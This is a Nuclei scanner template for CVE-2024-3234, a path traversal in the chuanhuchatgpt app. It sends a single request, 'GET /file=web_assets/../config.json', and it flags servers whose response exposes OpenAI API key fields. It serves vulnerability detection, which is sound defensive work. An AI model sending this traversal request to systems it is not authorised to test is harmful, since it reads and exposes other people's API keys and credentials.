CVE-2024-3234: Chuanhu Chat - Directory Traversal

id: CVE-2024-3234

info:
  name: Chuanhu Chat - Directory Traversal
  author: DhiyaneshDk
  severity: critical
  description: |
    The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-3234
    cwe-id: CWE-22
    epss-score: 0.65655
    epss-percentile: 0.98451
    cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gaizhenbiao
    product: chuanhuchatgpt
  tags: cve,cve2024,chuanhuchatgpt,lfi

http:
  - raw:
      - |
        GET /file=web_assets/../config.json HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"openai_api_key":'
          - '"openai_api_type":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220278e43665ca305d5e423b939d334304c573c85140c0c9e2e532b41f79fdee64302206d218c41721023dcfc90c2ca127cbe0fe9abcb8f9e81a3a1fc3e61f992dece35:922c64590222798bb761d5b6d8e72950